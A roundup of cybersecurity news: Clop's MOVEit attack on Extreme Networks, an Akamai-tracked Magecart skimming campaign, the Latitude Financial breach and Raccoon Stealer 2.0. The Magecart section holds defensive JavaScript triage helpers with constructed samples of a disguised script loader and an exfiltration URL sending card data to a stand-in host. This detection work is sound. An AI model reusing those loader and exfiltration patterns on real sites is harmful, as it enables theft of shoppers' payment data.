
Extreme Networks Hit by Clop MOVEit Attack

 

Extreme Networks has confirmed that it is among the victims of the fast-moving wave of attacks against MOVEit Transfer. As a result, customers who rely on Extreme Networks' hardware and services face the possibility of having their data exposed by the Clop (aka Cl0p) cyber extortion group.

The attacks exploit CVE-2023-34362, an SQL injection vulnerability in Progress Software's MOVEit Transfer managed file transfer product. Clop is reported to have been developing ways to exploit this flaw for a considerable time before the mass exploitation began.

Clop has a history of compromising file transfer products and turning them against their users. HR and payroll software provider Zellis has emerged as the most prominent victim of the current wave of attacks.

After spotting suspicious activity consistent with the CVE-2023-34362 exploit chain, LeMagIT contacted Extreme Networks on Tuesday, 6 June. It had found an instance of the affected product, MOVEit Transfer, linked to Extreme Networks' domain, and the behaviour of that instance suggested a possible compromise.

Philip Swain, Extreme Networks' Chief Information Security Officer, confirmed that the company's instance of Progress Software's MOVEit Transfer had been breached. He said the company activated its incident response procedures immediately and contained the affected systems.

Swain said the investigation is still in progress. If customer information is found to have been compromised, Extreme Networks will notify the affected customers directly and give them full details.

Separately, Israel-based threat intelligence firm Cybersixgill reported that its researchers had found several dark web forum posts explicitly seeking data on UK-based victims, one of them offering a reward of up to $100,000.

These requests specifically targeted Zellis customers. Cybersixgill added that the threat actor behind the posts claimed the acquired data would be handed to a team specialising in leveraging UK-sourced data.

Online Thieves Target Legitimate Ecommerce Sites to Steal Credit Cards

 

In a recently observed Magecart credit card theft campaign, legitimate websites are compromised and used as makeshift command and control (C2) servers from which skimmers are injected into, and hidden on, selected e-commerce sites.

A Magecart attack is one in which an online store is breached and malicious scripts are inserted that steal customers' credit card and personal information while they check out.

Akamai researchers tracking the campaign report victims in the United States, the United Kingdom, Australia, Brazil, Peru and Estonia.

A further indication of the attacks' stealth, the firm says, is that many victims were unaware they had been compromised for more than a month.

Exploiting legitimate sites 

The attackers first look for trustworthy websites that are vulnerable, compromise them, and use them to host the malicious code and act as C2 servers for the attacks.

Distributing the skimmer from reputable, legitimate domains lets the threat actors evade detection and blocklists, and spares them from building their own infrastructure.

They then insert a short JavaScript snippet into the targeted e-commerce sites that retrieves the malicious code from the previously compromised websites.

"Although it is unclear how these sites are being breached, based on our recent research from similar, previous campaigns, the attackers will usually look for vulnerabilities in the targeted websites' digital commerce platform (such as Magento, WooCommerce, WordPress, Shopify, etc.) or in vulnerable third-party services used by the website," researchers explained in the report. 

To make the attack harder to spot, the threat actors structured the skimmer to resemble Google Tag Manager or Facebook Pixel, well-known third-party services that are unlikely to attract attention. The host's URL is also hidden with Base64 encoding.

Data theft details 

Akamai observed two skimmer variants in this campaign.

The first, heavily obfuscated variant contains a set of CSS selectors targeting customers' PII and credit card fields; a different set of selectors was crafted for each targeted site.

The second variant is less well protected, and the indicators exposed in its code allowed Akamai to map the campaign's distribution and identify further victims.

Once the skimmer has collected the customer's data, it sends it to the attacker's server in an HTTP request issued by an IMG tag created inside the skimmer. The data is Base64 encoded, which obscures the transmission and reduces the chance that the victim notices the breach.
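The two stages just described (a loader that hides its C2 host behind Base64 and imitates a tag manager, and an exfiltration request carried in an image fetch with a Base64 payload) can be triaged from a page's scripts and a proxy log. The following is an added example written for this page, not code from the Akamai report or from the campaign; the C2 host, the `d` query parameter, the field names and the sample snippets are all constructed assumptions, not indicators from the report.

```javascript
// Added example (not from Akamai or the campaign): triage helpers for the two
// Magecart stages described above. All sample inputs are constructed here.

// Hosts a genuine tag-manager loader is expected to resolve to.
const KNOWN_TAG_HOSTS = new Set([
  "www.googletagmanager.com",
  "connect.facebook.net",
]);

// Stage 1: decode every atob("...") literal in a script and keep the ones that
// parse as an absolute URL; these are candidate C2 hosts.
function decodeLoaderHosts(snippet) {
  const hosts = [];
  const re = /atob\(\s*["']([A-Za-z0-9+\/=]+)["']\s*\)/g;
  let m;
  while ((m = re.exec(snippet)) !== null) {
    const decoded = Buffer.from(m[1], "base64").toString("utf8");
    try {
      hosts.push(new URL(decoded).hostname);
    } catch {
      // not a URL (e.g. an obfuscated string constant); ignore
    }
  }
  return hosts;
}

// A loader that looks like a tag manager but resolves somewhere else is
// exactly the campaign's trick; return those hosts.
function suspiciousHosts(snippet) {
  return decodeLoaderHosts(snippet).filter((h) => !KNOWN_TAG_HOSTS.has(h));
}

// Base64 -> JSON object, or null if the value is not that.
function tryDecodeJsonObject(b64) {
  try {
    const obj = JSON.parse(Buffer.from(b64, "base64").toString("utf8"));
    return obj !== null && typeof obj === "object" ? obj : null;
  } catch {
    return null;
  }
}

// Stage 2: given an outbound image request URL (proxy log, browser network
// panel), recover the destination host and the names of the stolen fields.
// Returns null when nothing in the query decodes to a JSON object.
function parseExfilUrl(url) {
  let u;
  try {
    u = new URL(url);
  } catch {
    return null;
  }
  const candidates = [...u.searchParams.values()];
  try {
    candidates.push(decodeURIComponent(u.search.slice(1))); // bare "?<b64>" form
  } catch {
    // malformed percent-encoding; the named parameters are still tried
  }
  for (const c of candidates) {
    const obj = tryDecodeJsonObject(c);
    if (obj) return { host: u.hostname, fields: Object.keys(obj) };
  }
  return null;
}

// ---- constructed samples (assumptions, not real indicators) --------------
const C2 = "https://cdn.example-compromised.test";
const b64 = (s) => Buffer.from(s).toString("base64");

// Loader as the campaign might inject it: GTM-looking path, hidden host.
const SAMPLE_LOADER =
  `(function(){var h=atob("${b64(C2)}");var s=document.createElement("script");` +
  `s.src=h+"/gtm.js?id=GTM-XXXXXX";document.head.appendChild(s);})();`;

// A genuine tag-manager loader written the same way decodes to a known host.
const LEGIT_LOADER =
  `var s=document.createElement("script");` +
  `s.src=atob("${b64("https://www.googletagmanager.com")}")+"/gtm.js";`;

// Exfil request the skimmer would assign to new Image().src (Visa test number).
const STOLEN = { cc: "4111111111111111", exp: "12/27", cvv: "123", name: "J Doe" };
const SAMPLE_EXFIL = `${C2}/img.php?d=${encodeURIComponent(b64(JSON.stringify(STOLEN)))}`;

if (typeof require !== "undefined" && require.main === module) {
  console.log(suspiciousHosts(SAMPLE_LOADER)); // [ 'cdn.example-compromised.test' ]
  console.log(suspiciousHosts(LEGIT_LOADER));  // []
  console.log(parseExfilUrl(SAMPLE_EXFIL));    // fields: [ 'cc', 'exp', 'cvv', 'name' ]
}
```

Run with `node` and feed it the inline scripts of a checkout page and the image URLs from its request log. Because the exfiltration channel is an image fetch, a Content-Security-Policy with a tight `img-src` blocks it even after the loader has been injected, which is a useful backstop alongside the CMS and account hardening mentioned below.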

Website owners can fend off Magecart attacks by properly securing administrator accounts and keeping their CMS and plugins up to date. Shoppers can limit their exposure by using electronic payment methods or virtual cards, or by capping how much can be charged to their credit cards.

Latitude Financial Reveals Extent of Cyber Attack: 14 Million Customers Affected

 

Latitude Financial, a company listed on the Australian Securities Exchange (ASX), recently reported that it had suffered a cyber attack. The company said the attack appeared to have originated from a major vendor it uses, and that the attacker had obtained login credentials from an employee. The attacker then used those credentials to steal personal information held by two other service providers.

Latitude Financial provides a range of financial services, including loans, credit cards, and insurance, in Australia, New Zealand, Canada, and Singapore. The company also offers interest-free installments for customers of retailers such as JB Hi-Fi, The Good Guys, and David Jones when they shop online. 

Following the attack, DXC Technology, a global technology services company, issued a statement on its website confirming that its global network and customer support networks were not compromised in the attack on Latitude Financial. 

Ten days after disclosing the attack, Latitude Financial found that the breach was far more severe than first believed: data on 14 million people had been accessed, rather than the roughly 330,000 initially reported.

The attacker had used the stolen employee credentials to access customer data held by both service providers before the access was shut off. As of 27 March, Latitude Financial had determined that 7.9 million Australian and New Zealand driver license numbers had been stolen, about 3.2 million of which had been provided to the company in the last 10 years. Around 53,000 passport numbers were also accessed, and fewer than 100 customers had a monthly financial statement stolen.

The company further confirmed that 6.1 million records dating back to 2005 had been accessed, including customers' names, addresses, telephone numbers and dates of birth.

In response to the breach, Latitude Financial's Chief Executive Officer, Ahmed Fahour, said the company was committed to working closely with affected customers and applicants to minimise risk and disruption, including covering the cost of replacing ID documents. The company also urged customers to stay vigilant, to report any suspicious activity on their accounts, and to remember that Latitude will never contact them to ask for a password.

Watch Out For This Raccoon Stealer 2.0 With New Capabilities


Raccoon Stealer, also known as Legion, Mohazo and Racealer, is a high-risk information-stealing trojan that harvests personal credentials from infected systems. It is back in a second, upgraded version circulating on cybercrime forums, offering criminals enhanced password-stealing functionality and improved operational capacity.

The trojan is sold as a service by various groups on hacking forums, and once installed on a system it can cause a wide range of problems for the victim.

The Raccoon Stealer operation shut down in March 2022 after its operators reported that one of the lead developers had been killed during Russia's invasion of Ukraine. At the same time, the team promised to return with a second, upgraded version with more capabilities.

“We expect a resurgence of Raccoon Stealer v2, as developers implemented a version tailored to the needs of cybercriminals (efficiency, performance, stealing capabilities, etc.) and scaled their backbone servers to handle large loads,” Sekoia said in its report.

According to the malware's developers, the new version was rebuilt from scratch in C/C++, with a new back end, a new front end, and new code for stealing credentials and other data.

Raccoon Stealer 2.0 has been distributed through a fake Malwarebytes website. Once running, it collects basic system fingerprinting information, browser passwords, cookies, autofill data and saved credit cards.

Other data Raccoon Stealer steals includes:

• Cryptocurrency wallet browser extensions, including MetaMask, TronLink, BinanceChain and Ronin
• Cryptocurrency wallet applications, including Exodus, Atomic, JaxxLiberty, Binance, Coinomi, Electrum, Electrum-LTC and ElectronCash
• Individual files on all disks
• Screenshots
• The list of installed applications

The stolen data can be misused in various ways, such as transferring funds out of victims' crypto wallets and other accounts (PayPal, bank accounts and so on), so victims can lose their savings. Hijacked accounts (Facebook, email and so on) can also be abused, for example to borrow money in the victim's name.

The stealer, which has already infected more than 100,000 devices, is sold on subscription for $200 a month. Its original version was already one of the most frequently mentioned malware families on underground forums in 2019.